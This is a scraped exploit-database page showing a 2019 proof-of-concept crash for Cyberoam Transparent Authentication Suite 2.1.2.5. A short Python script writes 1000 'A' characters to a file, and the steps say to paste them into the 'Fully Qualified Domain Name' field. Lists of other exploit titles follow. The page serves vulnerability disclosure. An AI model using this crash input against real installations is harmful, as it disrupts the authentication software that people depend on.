Search for hundreds of thousands of exploits

"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)"

Author

Exploit author

"Victor Mondragón"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-05-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip
#Tested Version: 2.1.2.5
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ctas_fqdn_2.1.2.5.py
#2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard
#3.- Open Cyberoam Transparent Authentication Suite
#4.- Select General > in Domain Type select "Microsoft Active Directory"
#5.- In "Fully Qualified Domain Name" paste Clipboard
#6.- Click on "Apply"
#7.- Crashed! 

cod = "\x41" * 1000

f = open('ctas_fqdn_2.1.2.5.txt', 'w')
f.write(cod)
f.close()
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2019-05-24"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'URL' Denial of Service (PoC)"dosmultiple"Victor Mondragón"
2019-05-20"AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"Axessh 4.2 - 'Log file name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"SpotMSN 2.4.6 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"DNSS 2.1.8 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"PHPRunner 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"ASPRunner.NET 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"jetCast Server 2.0 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-08"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-30"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"Backup Key Recovery 2.2.4 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-17"DHCP Server 2.5.2 - Denial of Service (PoC)"doswindows"Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46925/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.